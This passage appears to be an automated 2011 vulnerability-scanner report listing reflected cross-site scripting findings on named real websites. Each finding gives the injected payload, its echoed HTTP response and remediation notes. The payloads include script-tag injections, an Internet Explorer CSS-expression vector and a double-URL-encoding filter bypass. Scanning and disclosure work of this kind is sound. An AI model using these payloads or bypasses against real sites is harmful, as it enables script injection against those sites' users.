This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head><title>301 Moved Permanently</title></head><body> <script type='text/javascript' src='http://stats.townnews.com/shared-content/stats/comm ...[SNIP]... <a href="http://azstarnet.com/3edd0"style="x:expression(alert(1))"e9e7c857e46/"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3c84'%3b52a57e4836 was submitted in the REST URL parameter 1. This input was echoed as b3c84';52a57e4836 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www2.canada.com/b3c84';52a57e4836/index.html
Content-Type: text/html; charset=utf-8
Expires: Thu, 31 Mar 2011 20:33:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 31 Mar 2011 20:33:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 3573
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www2.canada.com/b3c84';52a57e4836/index.html">here</a>.</h2> </body></html> <form name="frmPage" method="pos ...[SNIP]... - /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName='/canada/www.canada.com/b3c84';52a57e4836/index.html'; s.server=window.location.hostname.toLowerCase(); s.channel='Canada'; s.pageType=''; s.p ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d74c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0866578095 was submitted in the REST URL parameter 1. This input was echoed as 1d74c"><script>alert(1)</script>a0866578095 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 31 Mar 2011 21:59:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 197
Location: http://SearchWarp.com/favicon.ico1d74c"><script>alert(1)</script>a0866578095
Cache-Control: private
Content-Type: text/html
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://SearchWarp.com/favicon.ico1d74c"><script>alert(1)</script>a0866578095">here</a>.</body>
1.156. http://www.searchwarp.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.searchwarp.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4961c"><script>alert(1)</script>13e487883c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 31 Mar 2011 21:59:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 200
Location: http://SearchWarp.com/favicon.ico?4961c"><script>alert(1)</script>13e487883c7=1
Cache-Control: private
Content-Type: text/html
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://SearchWarp.com/favicon.ico?4961c"><script>alert(1)</script>13e487883c7=1">here</a>.</body>
1.157. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.shop.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload d52ff><script>alert(1)</script>1d2e9c7eb57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
1.158. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.shop.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4308b"><script>alert(1)</script>a443b43ef30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
1.159. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.shopcompanion.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac848"><script>alert(1)</script>82d79a60015 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
1.160. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.shopcompanion.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 3b792><script>alert(1)</script>70fe5a6514e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
1.161. http://www.tangle.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.tangle.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4eea4<script>alert(1)</script>5dcabf655e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://www.godtube.com/favicon.ico?4eea4<script>alert(1)</script>5dcabf655e=1#alertbar">http://www.godtube.com/favicon.ico?4eea4<script>alert(1)</script>5dcabf655e=1#alertbar</a> ...[SNIP]...
1.162. http://www.tangle.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.tangle.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8503"><script>alert(1)</script>da2d2489d32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://www.godtube.com/favicon.ico?b8503"><script>alert(1)</script>da2d2489d32=1#alertbar">http://www.godtube.com/favicon ...[SNIP]...
1.163. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.townhall.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2ebc1<script>alert(1)</script>46f88b55933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?2ebc1<script>alert(1)</script>46f88b55933=1">http://townhall.com/favicon.ico?2ebc1<script>alert(1)</script>46f88b55933=1</a> ...[SNIP]...
1.164. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.townhall.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582da"><script>alert(1)</script>c977a78f916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?582da"><script>alert(1)</script>c977a78f916=1">http://townhall.com/favicon.ico?582da"><sc ...[SNIP]...
Report generated by XSS.CX at Thu Mar 31 18:33:35 CDT 2011.